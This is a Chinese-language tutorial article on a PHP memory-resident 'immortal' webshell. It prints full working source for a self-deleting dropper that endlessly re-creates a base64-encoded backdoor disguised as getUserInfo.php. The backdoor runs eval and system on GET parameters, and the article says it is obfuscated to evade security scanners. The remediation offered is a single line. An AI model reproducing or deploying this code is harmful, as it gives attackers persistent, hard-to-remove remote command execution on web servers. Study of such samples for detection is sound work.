带你分析PHP内存木马病毒实现原理
时间:2022-10-17 来源:互联网 标签: php
前言
内存木马,就是在内存中运行的木马病毒,没有代码实体。内存木马有着强隐蔽性,排查困难,杀不死(俗称不死马)的特点。
网络安全行业,有着很强的木桶效应。系统对抗黑帽,胜负取决于安全最薄弱的环节。黑帽对抗白帽,胜负取决于攻击水平和和毁尸灭迹隐蔽的水平。
正文本文不讨论是由于任意文件上传还是近源攻击让生产服务器有了一段可访问的恶意代码。
病毒源代码 (很简单)
<?php
//设置脚本不超时
set_time_limit(0);ignore_user_abort(true);
//删除文件本体
@unlink(__FILE__);
//给木马病毒起一个迷惑性的名字
$file = './getUserInfo.php';
//死循环常驻内存。释放木马文件
while(true) {
if(! file_exists($file)) @file_put_contents($file, base64_decode('PD9waHAKaWYoJGUgPSBAJF9HRVRbJ2UnXSkgewogICAgJGZ1bmMgPSBAY3JlYXRlX2Z1bmN0aW9uKG51bGwsIGJhc2U2NF9kZWNvZGUoJ1pYWmhiQ2dpJykgLiAkZSAuIGJhc2U2NF9kZWNvZGUoJ0lpazcnKSk7CiAgICAkZnVuYygpOwp9CgppZigkcyA9IEAkX0dFVFsncyddKSB7CiAgICAkZiA9IHN0cl9yZXBsYWNlKCd4JywgJycsICd4eHhzeHh5eHN4eHh4eHh0eHhleHh4bXh4eHh4eHh4Jyk7CiAgICAkZigkcyk7Cn0='));
sleep(60);
}
登录后复制释放病毒本体
<?php
//以下代码实现了eval关键字和system函数的伪装
//eval($_GET['e']);
if($e = @$_GET['e']) {
$func = @create_function(null, base64_decode('ZXZhbCgi') . $e . base64_decode('Iik7'));
$func();
}
//system($_GET['s']);
if($s = @$_GET['s']) {
$f = str_replace('x', '', 'xxxsxxyxsxxxxxxtxxexxxmxxxxxxxx');
$f($s);
}
登录后复制说明
以上关键敏感代码都做了编码,用于避开各种安全扫描的免杀。
一旦病毒样本运行起来,就会删除掉自身,并长期运行在内存当中。
就算被释放的木马被识破后删除,还会产生同样的文件。
解决方案
干掉进程后,删除释放的木马文件。
推荐:《PHP视频教程》
php入门到就业线上直播课:立即学习
全程直播 + 实战授课 + 边学 + 边练 + 边辅导
相关阅读更多 +
-
原神5.0成就侧耳倾听获取攻略
2024-12-05
-
浏览器内核有哪些 浏览器内核版本怎么看 浏览器内核版本过低怎么回事
2024-12-05
-
原神5.0成就舞舞舞获取攻略
2024-12-05
-
原神5.0成就猎龙的黑箭获取攻略
2024-12-05
-
什么是层次分析法 层次分析法的基本原理和步骤 层次分析法的优缺点
2024-12-05
-
原神5.0成就你也是迪诺巴鲁托获取攻略
2024-12-05
最近更新